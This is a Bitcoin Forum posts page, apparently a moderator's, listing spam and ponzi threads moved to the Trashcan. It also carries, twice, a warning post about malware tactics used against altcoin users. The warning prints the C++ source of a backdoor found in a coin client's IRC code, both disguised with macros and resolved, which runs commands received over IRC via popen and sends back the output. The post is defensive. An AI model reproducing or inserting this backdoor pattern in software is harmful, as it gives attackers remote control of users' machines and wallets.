Bitcoin Forum
June 17, 2024, 05:23:44 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
  Home Help Search Login Register More  
  Show Posts
Pages: « 1 ... 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 [215] 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 ... 443 »
4281  Bitcoin / Mining support / MOVED: Need help! on: January 29, 2015, 09:01:43 PM
This topic has been moved to Trashcan.

https://bitcointalk.org/index.php?topic=935707.0

Duplicate thread.
4282  Alternate cryptocurrencies / Marketplace (Altcoins) / MOVED: STAY AWAY FROM simxchg.com & cryptoplay.net on: January 29, 2015, 08:49:11 PM
This topic has been moved to Trashcan.

https://bitcointalk.org/index.php?topic=939876.0

Duplicate thread.
4283  Alternate cryptocurrencies / Altcoin Discussion / MOVED: 1000% GROWTH IN 14 DAYS on: January 29, 2015, 08:42:00 PM
This topic has been moved to Trashcan.

https://bitcointalk.org/index.php?topic=939357.0

Pointless promotion thread.
4284  Economy / Marketplace / MOVED: HONEST BITCOIN GIVEAWAYS IN BITS NOT SATOSHIS on: January 29, 2015, 03:54:22 PM
This topic has been moved to Trashcan.

https://bitcointalk.org/index.php?topic=939972.0

Ref spam.
4285  Alternate cryptocurrencies / Marketplace (Altcoins) / MOVED: [CryptoPet] ˁ˚ᴥ˚ˀ First Cryptocurrency Pet Apparel & Accessories Store ˁ˚ᴥ˚ˀ on: January 27, 2015, 07:34:20 PM
This topic has been moved to Trashcan.

https://bitcointalk.org/index.php?topic=936783.0

Duplicate thread.
4286  Alternate cryptocurrencies / Mining (Altcoins) / Beware of Increasingly Sophisticated Malware Infection Attempts on: January 26, 2015, 04:15:52 PM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Main thread: https://bitcointalk.org/index.php?topic=935898.0
4287  Alternate cryptocurrencies / Announcements (Altcoins) / Beware of Increasingly Sophisticated Malware Infection Attempts on: January 26, 2015, 04:13:37 PM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Main thread: https://bitcointalk.org/index.php?topic=935898.0
4288  Alternate cryptocurrencies / Service Discussion (Altcoins) / MOVED: b i t n e w f a u c e t . tk Earn up to 10000 satoshi and 100% Referral on: January 26, 2015, 11:06:12 AM
This topic has been moved to Trashcan.

https://bitcointalk.org/index.php?topic=929490.0

Ref spam.
4289  Economy / Gambling / MOVED: crpytowheel game scrypt 2 choices on: January 26, 2015, 10:52:17 AM
This topic has been moved to Trashcan.

https://bitcointalk.org/index.php?topic=936244.0

Duplicate thread.
4290  Economy / Gambling / MOVED: want your own ponzi game? on: January 26, 2015, 10:51:32 AM
This topic has been moved to Trashcan.

https://bitcointalk.org/index.php?topic=936063.0

Duplicate thread.
4291  Alternate cryptocurrencies / Altcoin Discussion / MOVED: History being made right NOW! BURST runs a decentralized lottery (Smart Contract on: January 25, 2015, 07:03:49 PM
This topic has been moved to Trashcan.

https://bitcointalk.org/index.php?topic=935422.0

Pointless redirection thread. Keep discussion of such posts in the thread they were posted in.
4292  Economy / Games and rounds / MOVED: ***VodPonzi*** Invest your bitcointalk accounts and earn 20% activity!!!!1! on: January 25, 2015, 06:25:41 PM
This topic has been moved to Trashcan.

https://bitcointalk.org/index.php?topic=935519.0

Trolling.
4293  Alternate cryptocurrencies / Marketplace (Altcoins) / MOVED: 247exchange.com: buy & sell altcoins in Australia at the best rates! Discounts! on: January 23, 2015, 08:52:15 PM
This topic has been moved to Trashcan.

https://bitcointalk.org/index.php?topic=932426.0

Duplicate thread.
4294  Alternate cryptocurrencies / Altcoin Discussion / MOVED: ★★DigiByte iOS Wallet★★ Now On The Apple Store + January Update on: January 23, 2015, 08:49:46 PM
This topic has been moved to Trashcan.

https://bitcointalk.org/index.php?topic=933590.0

Advertising spam.
4295  Alternate cryptocurrencies / Altcoin Discussion / MOVED: [AUM]ALEXIUM COIN - working on the free energy! on: January 23, 2015, 08:47:28 PM
This topic has been moved to Trashcan.

https://bitcointalk.org/index.php?topic=933885.0

Ref spam.
4296  Alternate cryptocurrencies / Service Announcements (Altcoins) / MOVED: ▪▪▪▪▪▪▪► [FAUCET] FREE GreenStox Giveaway! (BTC & Counterparty stock) on: January 23, 2015, 08:44:25 PM
This topic has been moved to Trashcan.

https://bitcointalk.org/index.php?topic=927375.0

Duplicate thread.
4297  Bitcoin / Pools / MOVED: Site Let's You Earn Bitcoins free without even your computer on! on: January 23, 2015, 08:38:19 PM
This topic has been moved to Trashcan.

https://bitcointalk.org/index.php?topic=933991.0

Ref spam.
4298  Bitcoin / Bitcoin Discussion / MOVED: WELL WOTS THE PRICE GOING TO BE THEN on: January 23, 2015, 08:30:33 PM
This topic has been moved to Trashcan.

https://bitcointalk.org/index.php?topic=933647.0

Trolling.
4299  Economy / Goods / MOVED: [WTS] Turkish military TANK High quality, working on: January 23, 2015, 08:15:26 PM
This topic has been moved to Trashcan.

https://bitcointalk.org/index.php?topic=933857.0

Troll thread.
4300  Economy / Games and rounds / MOVED: Xcoinprofit.com-Ponzi 125% Return-Start Investment 0.01BTC on: January 23, 2015, 08:13:29 PM
This topic has been moved to Trashcan.

https://bitcointalk.org/index.php?topic=933817.0

Duplicate thread.
Pages: « 1 ... 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 [215] 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 ... 443 »
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!